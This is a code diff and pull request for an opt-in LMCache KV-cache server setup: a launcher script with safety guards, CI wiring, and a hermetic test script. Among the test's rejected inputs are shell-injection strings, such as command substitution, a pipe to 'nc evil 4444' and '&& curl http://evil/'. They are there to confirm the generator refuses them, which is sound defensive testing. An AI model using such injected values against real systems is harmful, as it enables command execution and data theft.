 FABRIC_IP="${1:?usage: run-lmcache-server.sh <this-node-fabric-ip> [image]}"
 IMAGE="${2:-dspark-vllm-gx10:lmcache054}"
 DISK="${LMCACHE_DISK_DIR:-$HOME/lmcache-disk}"
-mkdir -p "$DISK"
+PORT="${LMCACHE_PORT:-6667}"
+# 0 = kernel default (Docker's default too), so this is a no-op unless set.
+# A negative value biases the OOM killer away from the cache server on 128 GB
+# unified-memory boards; see README, "Operational risk" — it makes the engine
+# the likelier victim instead, which is the recoverable failure of the two.
+OOM_SCORE_ADJ="${LMCACHE_OOM_SCORE_ADJ:-0}"
+
+die() { echo "error: $*" >&2; exit 1; }
+
+# --- preflight (fail before we touch a running cache) -----------------------
+command -v docker >/dev/null 2>&1 || die "docker not found on PATH"
+docker image inspect "$IMAGE" >/dev/null 2>&1 \
+  || die "image '$IMAGE' not present locally; build the derived image first (README)"
+
+# The server must bind THIS node's fabric IP; a typo binds nothing and the
+# engine's lookups then go to a socket that never answers.
+if command -v ip >/dev/null 2>&1; then
+  ip -o -4 addr show 2>/dev/null | grep -qw "$FABRIC_IP" \
+    || die "$FABRIC_IP is not bound on this host; pass THIS node's fabric IP"
+fi
+
+# cupy is load-bearing: without it the server silently fails GPU-context
+# creation and every engine registration kills the vLLM head (LMCache #4759).
+docker run --rm --entrypoint python3 "$IMAGE" -c 'import cupy, lmcache' >/dev/null 2>&1 \
+  || die "image '$IMAGE' cannot import cupy and lmcache; see README requirements"
+
+mkdir -p "$DISK" || die "cannot create L2 dir $DISK"
+[ -w "$DISK" ] || die "L2 dir $DISK is not writable"
+
+# Replacing a LIVE server is the documented wedge condition: the replacement
+# comes up with no GPU contexts and the engine parks every lookup hit forever.
+if [ -n "$(docker ps -q -f name="^lmcache-server$")" ]; then
+  [ "${LMCACHE_FORCE_REPLACE:-0}" = "1" ] \
+    || die "lmcache-server is already RUNNING. Replacing it wedges a live engine
+       (see README, 'Operational risk'). Stop the pair first, or re-run with
+       LMCACHE_FORCE_REPLACE=1 if the pair is already down."
+fi
 docker rm -f lmcache-server >/dev/null 2>&1 || true
+
 # --restart no is deliberate: a dead server must be VISIBLE (see README —
 # an auto-restarted empty server currently wedges the engine silently).
 docker run -d --name lmcache-server --network host --ipc host --gpus all \
   --restart no \
+  --oom-score-adj "$OOM_SCORE_ADJ" \
   -e PYTHONHASHSEED=0 \
   -v "$DISK:/lmcache-disk" \
   --entrypoint lmcache "$IMAGE" server \
-  --host "$FABRIC_IP" --port 6667 --chunk-size 256 \
+  --host "$FABRIC_IP" --port "$PORT" --chunk-size 256 \
   --l1-size-gb "${LMCACHE_L1_GB:-12}" --l1-use-lazy --eviction-policy LRU \
   --l2-adapter '{"type":"fs","base_path":"/lmcache-disk"}' \
-  --disable-observability
-echo "lmcache server up on ${FABRIC_IP}:6667 (L1 ${LMCACHE_L1_GB:-12}G, fs L2 at $DISK)"
+  --disable-observability >/dev/null
+
+# --- verify the resulting state, not the exit code of docker run -----------
+for _ in $(seq 1 30); do
+  [ -n "$(docker ps -q -f name="^lmcache-server$")" ] || break
+  if (exec 3<>"/dev/tcp/${FABRIC_IP}/${PORT}") 2>/dev/null; then
+    exec 3<&- 2>/dev/null || true
+    echo "lmcache server up on ${FABRIC_IP}:${PORT} (L1 ${LMCACHE_L1_GB:-12}G, fs L2 at $DISK)"
+    echo "NOTE: start the engine only after EVERY node reports this line."
+    exit 0
+  fi
+  sleep 1
+done
+echo "--- lmcache-server logs ---" >&2
+docker logs --tail=50 lmcache-server >&2 2>&1 || true
+die "lmcache-server did not come up listening on ${FABRIC_IP}:${PORT}"

--- a/scripts/ci-validate.sh
+++ b/scripts/ci-validate.sh
@@ -25,6 +25,8 @@ for f in \
   scripts/test-nccl-ib-hca-gid-resolve.sh \
   scripts/boot-shape-warmup.sh \
   scripts/test-boot-shape-warmup.sh \
+  lmcache/run-lmcache-server.sh \
+  scripts/test-lmcache-compose-gate.sh \
   patches/*.sh
 do
   [ -e "$f" ] || continue
@@ -56,6 +58,7 @@ py_files+=(
   scripts/ab-issue133-triton-specialization.py
   tests/test_dspark_stacked_mapping.py
   tests/test_issue133_triton_specialization.py
+  lmcache/patch-compose-lmcache.py
 )
 python3 -m py_compile "${py_files[@]}"
 ok "py_compile ${#py_files[@]} files"
@@ -111,6 +114,8 @@ bash scripts/test-boot-shape-warmup.sh -q
 ok "test-boot-shape-warmup"
 bash scripts/test-nccl-ib-hca-gid-resolve.sh -q
 ok "test-nccl-ib-hca-gid-resolve"
+bash scripts/test-lmcache-compose-gate.sh -q
+ok "test-lmcache-compose-gate"
 
 echo "== recipe guards (do not re-ship known regressions) =="
 

--- a/scripts/test-lmcache-compose-gate.sh
+++ b/scripts/test-lmcache-compose-gate.sh
@@ -1,0 +1,375 @@
+#!/usr/bin/env bash
+# CPU-only, hermetic gate for the lmcache/ option directory (PR #148 review):
+#   1. opt-in boundary — the generated compose's shipped gate branch, run
+#      through bash (not a copy), keeps the stock allocator + hash behaviour
+#      and an empty KVT_ARGS for unset/0/true/2, and for exactly 1 adds ALL
+#      THREE changes atomically: connector argv, PYTHONHASHSEED=0, allocator
+#      unset;
+#   2. source-anchor drift — the generator refuses mutated compose sources;
+#   3. server-urls grammar — shell metacharacters / substitutions / bad ports
+#      / fake-IPv4 hosts are refused at generation time (PR #148 injection
+#      reproducer included);
+#   4. rendered config — with the flag off the generated compose renders stock
+#      allocator/hash behaviour; the deltas vs stock are exactly the inert
+#      ones (needs docker compose; skipped with a note where unavailable);
+#   5. run-lmcache-server.sh lifecycle guards under a stateful docker stub:
+#      refuse under a live model container (no FORCE_REPLACE bypass), refuse
+#      a live server without the override, proceed when the pair is down,
+#      and fail CLOSED when docker ps itself errors.
+set -euo pipefail
+
+ROOT="$(cd "$(dirname "$0")/.." && pwd)"
+COMPOSE="$ROOT/docker-compose.dspark.yml"
+GEN="$ROOT/lmcache/patch-compose-lmcache.py"
+QUIET=0
+[ "${1:-}" = "-q" ] && QUIET=1
+
+pass=0
+fail=0
+say() { [ "$QUIET" = "1" ] || printf '  ok  %s\n' "$*"; }
+ok() { pass=$((pass + 1)); say "$*"; }
+bad() { fail=$((fail + 1)); printf '  FAIL %s\n' "$*" >&2; }
+
+tmp="$(mktemp -d)"
+trap 'rm -rf "$tmp"' EXIT
+
+URLS="tcp://192.0.2.10:6667,tcp://192.0.2.11:6668"
+OUT="$tmp/docker-compose.lmcache.yml"
+
+# --- 0. happy path generation -----------------------------------------------
+if python3 "$GEN" "$COMPOSE" "$OUT" "$URLS" >/dev/null 2>&1 && [ -s "$OUT" ]; then
+  ok "generator produces an overlay for valid tcp://host:port urls"
+else
+  bad "generator failed on the documented happy path"
+  printf 'RESULT: %d passed, %d failed\n' "$pass" "$fail"
+  exit 1
+fi
+
+# --- 0b. static post-generation invariants (docker-free) ---------------------
+# The generator asserts these too, but the CONTRACT needs an independent
+# defender: if a future generator edit drops an assert, this must still fail
+# even on hosts with no docker — the rendered layer must not be the only
+# thing standing between a regression and a green check.
+inv_ok=1
+grep -Fq 'PYTORCH_CUDA_ALLOC_CONF: "${PYTORCH_CUDA_ALLOC_CONF:-expandable_segments:True}"' "$OUT" \
+  || { inv_ok=0; bad "overlay altered the stock PYTORCH_CUDA_ALLOC_CONF env entry"; }
+if grep -Eq '^[[:space:]]+PYTHONHASHSEED:' "$OUT"; then
+  inv_ok=0; bad "overlay added a service-env PYTHONHASHSEED entry (must be exported inside the gate only)"
+fi
+if [ "$(grep -o 'DSPARK_ENABLE_LMCACHE' "$OUT" | wc -l | tr -d ' ')" != "3" ]; then
+  inv_ok=0; bad "unexpected DSPARK_ENABLE_LMCACHE occurrence count (expected one gate + one pass-through entry)"
+fi
+[ "$inv_ok" = "1" ] && ok "post-generation invariants: allocator entry intact, no env hashseed, single gate"
+
+# --- 1. shipped gate, extracted from the GENERATED compose (not a copy) -----
+# entrypoint text uses $$ for $; the block sits between KVT_ARGS="" and the
+# allocator unset inside the exactly-1 branch.
+fragment="$(sed -n '/^        KVT_ARGS="";$/,/unset PYTORCH_CUDA_ALLOC_CONF; fi;$/p' "$OUT" | sed 's/\$\$/$/g')"
+if ! printf '%s\n' "$fragment" | grep -q 'LMCacheMPConnector'; then
+  echo "FAIL could not extract the KVT gate from $OUT" >&2
+  exit 1
+fi
+{
+  printf '%s\n' "$fragment"
+  printf '%s\n' 'if [ -n "$KVT_ARGS" ]; then echo KVT=set; else echo KVT=empty; fi'
+  printf '%s\n' 'if [ -z "${PYTORCH_CUDA_ALLOC_CONF+x}" ]; then echo ALLOC=unset; else echo "ALLOC=$PYTORCH_CUDA_ALLOC_CONF"; fi'
+  printf '%s\n' 'if [ -z "${PYTHONHASHSEED+x}" ]; then echo HASH=absent; else echo "HASH=$PYTHONHASHSEED"; fi'
+  printf '%s\n' 'if [ -n "$KVT_ARGS" ]; then printf '\''KVTVAL %s\n'\'' "$KVT_ARGS"; fi'
+} >"$tmp/gate.sh"
+
+# Stock service env (what compose hands the entrypoint) presets the allocator.
+STOCK='KVT=empty
+ALLOC=expandable_segments:True
+HASH=absent'
+disabled_ok=1
+for flag in UNSET 0 true 2 FALSE yes; do
+  if [ "$flag" = "UNSET" ]; then
+    out="$(env PYTORCH_CUDA_ALLOC_CONF=expandable_segments:True bash "$tmp/gate.sh")"
+  else
+    out="$(env DSPARK_ENABLE_LMCACHE="$flag" PYTORCH_CUDA_ALLOC_CONF=expandable_segments:True bash "$tmp/gate.sh")"
+  fi
+  got="$(printf '%s\n' "$out" | grep -v '^KVTVAL ')"
+  [ "$got" = "$STOCK" ] || { disabled_ok=0; bad "flag=$flag changed the stock path: $(printf '%s' "$got" | tr '\n' ' ')"; }
+done
+[ "$disabled_ok" = "1" ] && ok "unset/0/true/2/FALSE/yes keep stock allocator, hash, and empty KVT"
+
+out1="$(env DSPARK_ENABLE_LMCACHE=1 PYTORCH_CUDA_ALLOC_CONF=expandable_segments:True bash "$tmp/gate.sh")"
+# The three probes must flip together — that is the atomicity contract.
+if printf '%s\n' "$out1" | grep -qx 'KVT=set' \
+&& printf '%s\n' "$out1" | grep -qx 'ALLOC=unset' \
+&& printf '%s\n' "$out1" | grep -qx 'HASH=0' \
+&& ! printf '%s\n' "$out1" | grep -qx 'HASH=absent'; then
+  ok "exactly 1 applies all three changes together (connector argv, hashseed, allocator unset)"
+else
+  bad "flag=1 did not apply all three changes: $(printf '%s' "$out1" | grep -v '^KVTVAL ' | tr '\n' ' ')"
+fi
+
+# Connector payload must be valid JSON carrying the urls verbatim.
+kvtval="$(printf '%s\n' "$out1" | sed -n 's/^KVTVAL //p' | head -1)"
+if python3 - "$kvtval" "$URLS" <<'PY'
+import json, sys
+arg, urls = sys.argv[1], sys.argv[2]
+flag, _, js = arg.partition(" ")
+assert flag == "--kv-transfer-config", flag
+cfg = json.loads(js)
+assert cfg["kv_connector"] == "LMCacheMPConnector", cfg
+assert cfg["kv_role"] == "kv_both", cfg
+assert cfg["kv_connector_extra_config"]["lmcache.mp.server_urls"] == urls, cfg
+PY
+then
+  ok "flag=1 emits valid --kv-transfer-config JSON with the server urls verbatim"
+else
+  bad "flag=1 connector payload is not the expected JSON: $kvtval"
+fi
+
+# --- 2. source-anchor drift --------------------------------------------------
+mutate() { # <dst> <needle>
+  python3 - "$COMPOSE" "$1" "$2" <<'PY'
+import sys
+src, dst, needle = sys.argv[1], sys.argv[2], sys.argv[3]
+s = open(src).read()
+assert needle in s, "needle already absent: " + needle
+open(dst, "w").write(s.replace(needle, "# mutated\n", 1))
+PY
+}
+drift_ok=1
+for needle in \
+  'if [ -n "$${DSPARK_REVISION:-}" ]; then REVISION_ARGS="--revision $${DSPARK_REVISION}"; fi;' \
+  '        $${VLLM_QUANTIZATION_ARGS}
+' \
+  'PYTORCH_CUDA_ALLOC_CONF: "${PYTORCH_CUDA_ALLOC_CONF:-expandable_segments:True}"' \
+  '      HF_HOME: /cache/huggingface
+'
+do
+  mutate "$tmp/mut.yml" "$needle"
+  if err="$(python3 "$GEN" "$tmp/mut.yml" "$tmp/mut-out.yml" "$URLS" 2>&1)"; then
+    drift_ok=0
+    bad "generator accepted a source with a mutated anchor: $needle"
+  elif ! printf '%s' "$err" | grep -q 'not found'; then
+    drift_ok=0
+    bad "drift refusal had no anchor message: $err"
+  fi
+  [ -e "$tmp/mut-out.yml" ] && { drift_ok=0; bad "drift run still wrote an overlay"; }
+done
+[ "$drift_ok" = "1" ] && ok "source-anchor drift is refused on all four anchors"
+
+# --- 3. server-urls grammar (PR #148 injection reproducer included) ----------
+reject=(
+  # the exact class from the review: command substitution riding an IFS trick
+  "tcp://192.0.2.10:6667\$(touch${IFS}$tmp/pwn)"
+  'tcp://192.0.2.10:6667`id`'
+  'tcp://192.0.2.10:6667;touch x'
+  'tcp://192.0.2.10:6667|nc evil 4444'
+  'tcp://192.0.2.10:6667 && curl http://evil/'
+  'tcp://192.0.2.10:6667"x"'
+  'tcp://192.0.2.10:6667\"},\"x\":\"'
+  'tcp://192.0.2.10:6667&touch x'
+  'http://192.0.2.10:6667'
+  'TCP://192.0.2.10:6667'
+  '192.0.2.10:6667'
+  'tcp://192.0.2.10'
+  'tcp://192.0.2.10:6667/x'
+  'tcp://192.0.2.10:0'
+  'tcp://192.0.2.10:65536'
+  'tcp://192.0.2.10:06667'
+  'tcp://192.0.2.10:abc'
+  'tcp://192.0.2.10:-1'
+  'tcp://192.0.2.10:6667 '
+  'tcp://192.0.2.10:6667,'
+  'tcp://192.0.2.10:6667,,tcp://192.0.2.11:6668'
+  'tcp://[fd00::10]:6667'
+  'tcp://host_name:6667'
+  'tcp://192.0.2.10:6667	tcp://192.0.2.11:6668'
+  $'tcp://192.0.2.10:6667\ntcp://192.0.2.11:6668'
+  # hosts that look like IPv4 literals must be valid dotted quads (RFC1123
+  # would otherwise swallow them as "all-numeric labels" and defer the typo
+  # to connect time)
+  'tcp://999.999.999.999:6667'
+  'tcp://256.1.1.1:6667'
+  'tcp://01.2.3.4:6667'
+  'tcp://1.2.3:6667'
+  'tcp://1.2.3.4.5:6667'
+  'tcp://...:6667'
+)
+rej_ok=1
+for badurl in "${reject[@]}"; do
+  if python3 "$GEN" "$COMPOSE" "$tmp/bad-out.yml" "$badurl" >/dev/null 2>&1; then
+    rej_ok=0
+    bad "generator accepted a rejected url: $(printf '%q' "$badurl")"
+  fi
+  [ -e "$tmp/bad-out.yml" ] && { rej_ok=0; bad "accepted a rejected url AND wrote an overlay: $(printf '%q' "$badurl")"; }
+done
+[ -e "$tmp/pwn" ] && { rej_ok=0; bad "injection marker was created"; }
+[ "$rej_ok" = "1" ] && ok "all $(printf '%s\n' "${reject[@]}" | wc -l | tr -d ' ') malicious/malformed url inputs are refused"
+
+good_ok=1
+for goodurl in \
+  'tcp://192.168.104.10:6667' \
+  'tcp://192.168.104.10:1,tcp://192.168.104.11:65535' \
+  'tcp://node-a.example.com:6667' \
+  'tcp://node01:6667' \
+  'tcp://localhost:6667' \
+  'tcp://10.server.example:6667'
+do
+  if ! python3 "$GEN" "$COMPOSE" "$tmp/good.yml" "$goodurl" >/dev/null 2>&1; then
+    good_ok=0
+    bad "generator refused a valid url: $goodurl"
+  fi
+done
+[ "$good_ok" = "1" ] && ok "valid urls accepted (IPv4, port bounds, FQDN, single-label, mixed)"
+
+# --- 4. rendered-config layer (needs docker compose) --------------------------
+if docker compose version >/dev/null 2>&1; then
+  : >"$tmp/env"
+  render() { # <compose-file> [extra env assignments...] -> stdout (or empty on failure)
+    local cf="$1"; shift
+    (cd "$ROOT" && env -u NODE_RANK -u HEADLESS COMPOSE_DISABLE_ENV_FILE=1 NODE_RANK=0 "$@" \
+      docker compose -p dsparktest --project-directory "$ROOT" --env-file "$tmp/env" -f "$cf" config 2>/dev/null) || true
+  }
+  rendered_off="$(render "$OUT")"
+  rendered_on="$(render "$OUT" DSPARK_ENABLE_LMCACHE=1)"
+  rendered_stock="$(render "$COMPOSE")"
+
+  if printf '%s' "$rendered_off" | grep -Eq 'DSPARK_ENABLE_LMCACHE: *"0"' \
+  && printf '%s' "$rendered_off" | grep -Eq 'PYTORCH_CUDA_ALLOC_CONF: *"?expandable_segments:True"?' \
+  && ! printf '%s' "$rendered_off" | grep -Eq '^[[:space:]]+PYTHONHASHSEED:'; then
+    ok "rendered overlay (flag off): inert pass-through, stock allocator entry, no PYTHONHASHSEED env"
+  else
+    bad "rendered overlay (flag off) does not show the expected inert config"
+  fi
+
+  if printf '%s' "$rendered_on" | grep -Eq 'DSPARK_ENABLE_LMCACHE: *"1"' \
+  && printf '%s' "$rendered_on" | grep -q 'LMCacheMPConnector'; then
+    ok "rendered overlay (flag on): pass-through renders 1 and the gate carries the connector"
+  else
+    bad "rendered overlay (flag on) does not show the connector gate"
+  fi
+
+  if [ -n "$rendered_off" ] && [ -n "$rendered_stock" ]; then
+    # Word-multiset compare, not line diff: the renderer re-wraps the long
+    # entrypoint line, so only token multisets are stable. Normalization drops
+    # YAML/shell re-escaping (backslash, double quote). The flag-off render
+    # must be a PURE ADDITION over stock, and every added token must be
+    # explainable by the generated overlay's own gate / pass-through lines
+    # (plus the resolved "0" default of the interpolated env value).
+    norm() { tr -d '"\\' | tr -s '[:space:]' '\n' | grep -v '^$' | sort; }
+    ws="$(printf '%s\n' "$rendered_stock" | norm)"
+    wo="$(printf '%s\n' "$rendered_off" | norm)"
+    gate_words="$( { grep -e 'KVT_ARGS' -e 'DSPARK_ENABLE_LMCACHE' "$OUT"; printf '%s\n' 0 1; } | norm | sort -u)"
+    removed="$(comm -23 <(printf '%s\n' "$ws") <(printf '%s\n' "$wo"))"
+    unexplained="$(comm -13 <(printf '%s\n' "$ws") <(printf '%s\n' "$wo") | sort -u \
+      | comm -23 - <(printf '%s\n' "$gate_words"))"
+    if [ -z "$removed" ] && [ -z "$unexplained" ]; then
+      ok "flag-off rendered delta vs stock is pure addition, confined to the KVT gate + pass-through"
+    else
+      bad "flag-off render changes more than the inert deltas (removed/unexplained tokens):"
+      printf '%s\n' "$removed" "$unexplained" | { grep -v '^$' || true; } | head -10 >&2
+    fi
+  else
+    bad "docker compose config failed to render stock or overlay"
+  fi
+else
+  say "SKIP rendered-config checks (docker compose unavailable); gate-fragment checks above still cover the contract"
+fi
+
+# --- 5. lifecycle guards (run-lmcache-server.sh under a stateful docker stub) --
+# Exercises the REAL launcher code path against a fake docker whose state
+# lives in files: model/server containers "run" iff their state file is
+# non-empty. The stub's run -d deliberately does NOT bring the server state
+# up, so a launcher that gets past the guards dies fast in the verify loop
+# (empty ps -> immediate break) instead of waiting on a real port; the
+# "proceeded" marker is what we assert on, not the launcher's exit code.
+mkdir -p "$tmp/bin" "$tmp/state"
+cat >"$tmp/bin/docker" <<'SH'
+#!/usr/bin/env bash
+st() { cat "$FAKE_DOCKER_STATE/$1" 2>/dev/null || true; }
+case "$1 $2" in
+  "image inspect") exit 0 ;;
+  "ps -q")
+    case "$*" in
+      *vllm-dspark*) st model ;;
+      *lmcache-server*) st server ;;
+      *) : ;;
+    esac
+    exit "${FAKE_PS_RC:-0}" ;;
+  "rm -f") : >"$FAKE_DOCKER_STATE/server"; exit 0 ;;
+  "run --rm") exit 0 ;;
+  "run -d") touch "$FAKE_DOCKER_STATE/proceeded"; exit 0 ;;
+  "logs --tail=50") exit 1 ;;
+esac
+exit 0
+SH
+chmod +x "$tmp/bin/docker"
+cat >"$tmp/bin/ip" <<'SH'
+#!/usr/bin/env bash
+echo "1: lo    INET 127.0.0.1/8 scope host lo"
+SH
+chmod +x "$tmp/bin/ip"
+
+set_states() { # <model-up?> <server-up?>
+  : >"$tmp/state/model"; : >"$tmp/state/server"; rm -f "$tmp/state/proceeded"
+  if [ -n "${1:-}" ]; then printf id1 >"$tmp/state/model"; fi
+  if [ -n "${2:-}" ]; then printf id2 >"$tmp/state/server"; fi
+}
+run_launcher() { # <force-replace-value> [ps-rc] -> LRC=exit, LOUT=output
+  LRC=0
+  LOUT="$(PATH="$tmp/bin:$PATH" FAKE_DOCKER_STATE="$tmp/state" LMCACHE_DISK_DIR="$tmp/disk" \
+    LMCACHE_FORCE_REPLACE="${1:-0}" FAKE_PS_RC="${2:-0}" \
+    bash "$ROOT/lmcache/run-lmcache-server.sh" 127.0.0.1 fakeimg:latest 2>&1)" || LRC=$?
+}
+
+lc_ok=1
+
+# Guard 1: live model container => refuse, and LMCACHE_FORCE_REPLACE must NOT help.
+for force in 0 1; do
+  set_states up ""
+  run_launcher "$force"
+  if [ "$LRC" -eq 0 ] || ! printf '%s' "$LOUT" | grep -q 'model (vllm-dspark) container is RUNNING' \
+  || [ -e "$tmp/state/proceeded" ]; then
+    lc_ok=0; bad "guard 1 did not refuse under a live model (force=$force): $LOUT"
+  fi
+done
+[ "$lc_ok" = "1" ] && ok "guard 1 refuses recreation under a live model container, immune to LMCACHE_FORCE_REPLACE"
+
+# Guard 2: live server + pair down => refuse without the override, and the live
+# server must not have been rm'd.
+set_states "" up
+run_launcher 0
+if [ "$LRC" -ne 0 ] && printf '%s' "$LOUT" | grep -q 'lmcache-server is already RUNNING' \
+&& [ "$(cat "$tmp/state/server")" = "id2" ] && [ ! -e "$tmp/state/proceeded" ]; then
+  ok "guard 2 refuses recreation of a live server without LMCACHE_FORCE_REPLACE"
+else
+  bad "guard 2 recreated a live server without override: $LOUT"
+fi
+
+# Pair down + override => proceeds past the guards to docker run.
+set_states "" up
+run_launcher 1
+if [ -e "$tmp/state/proceeded" ]; then
+  ok "guard 2 allows the documented forced re-create when no model container runs"
+else
+  bad "guard 2 blocked a legitimate LMCACHE_FORCE_REPLACE=1 re-create: $LOUT"
+fi
+
+# Clean state => proceeds.
+set_states "" ""
+run_launcher 0
+if [ -e "$tmp/state/proceeded" ]; then
+  ok "clean-boot path (nothing running) proceeds to docker run"
+else
+  bad "clean-boot path was refused: $LOUT"
+fi
+
+# Fail CLOSED: a broken docker ps must never read as "nothing is running".
+set_states "" ""
+run_launcher 0 1
+if [ "$LRC" -ne 0 ] && printf '%s' "$LOUT" | grep -q 'without trustworthy state' \
+&& [ ! -e "$tmp/state/proceeded" ]; then
+  ok "lifecycle guards fail closed when docker ps itself fails"
+else
+  bad "guards fail-open on a docker ps error: $LOUT"
+fi
+
+
+printf 'RESULT: %d passed, %d failed\n' "$pass" "$fail"
+[ "$fail" -eq 0 ]


### PR DESCRIPTION
## What

An **opt-in, off-by-default** `lmcache/` option directory wiring [LMCache](https://github.com/LMCache/LMCache) (MP mode) into this recipe: per-node `lmcache server` processes (CPU L1 + NVMe filesystem L2) hold KV across engine restarts, connected via `LMCacheMPConnector`. Nothing in the stock path changes — the generated compose overlay boots identically with `DSPARK_ENABLE_LMCACHE` unset.

## Why

These pairs ship with 4TB NVMe that the recipe barely touches. With this enabled, a ~107K-token context that costs **~65s to re-prefill reloads in ~1.83–1.92s** (measured on a GB10 pair, TP=2, `nvfp4_ds_mla` KV, this recipe's pinned image + `pip install lmcache==0.5.4` and friends in a derived layer). Same numbers across repeated trials; warm-hit serving path verified end-to-end (boot → store → warm hits → engine restart → reload).

## What's in the directory

- `README.md` — full guide: derived-image deps (including why `cupy-cuda13x` is load-bearing and how to source-build `cuda_ops` for sm_121a), non-negotiable config, lifecycle rules, verification steps
- `run-lmcache-server.sh` — per-node server launcher (`--restart no` is deliberate — see below)
- `patch-compose-lmcache.py` — generates `docker-compose.lmcache.yml` from `docker-compose.dspark.yml`; injects the connector config gated on `DSPARK_ENABLE_LMCACHE=1`, pins `PYTHONHASHSEED=0`, clears `PYTORCH_CUDA_ALLOC_CONF` (vLLM rejects KV connectors with `expandable_segments:True`). Anchor-asserted so it fails loudly if the compose layout drifts. Validated against current `main`'s compose with `docker compose config`.

## Why "experimental"

The happy path is solid; the *failure* paths upstream are still being hardened, and the README is blunt about them:

- Restarting an `lmcache server` loses its GPU contexts, and current upstream then parks every lookup-hit request forever (scheduler heartbeat never starts + lookup errors don't propagate). I filed the field report as LMCache#4759 and the heartbeat fix as LMCache#4764; LMCache#4754 adds a defensive event-IPC selector for driver 580/CUDA 13 platforms.
- Mitigation until those land (documented as hard rules): treat pair+servers as one lifecycle unit, run servers with `--restart no` so death is visible, restart the whole pair on any `No GPU context found`.
- `PYTHONHASHSEED=0` is mandatory on every process — chunk keys use Python's randomized `hash()`, so an unpinned restart silently invalidates the entire cache.
- On 128GB unified-memory nodes the server can be OOM-pressured during engine weight load; monitor it.

## Testing

- Overlay generation validated against current `main` compose (`docker compose config` passes; stock boot unchanged with the flag off)
- Serving path: repeated store/reload trials on a production-config 2× pair — 3/3 instrumented trials + 2 untraced trials, reload TTFT 1.83–1.92s for the 107K-token context
- Failure modes exercised deliberately (server restart mid-lifecycle, engine restart against live servers) — that's where the lifecycle rules and upstream issues above come from

Happy to iterate on placement/naming if you'd rather this live elsewhere (e.g. `docs/` as a guide rather than an option directory).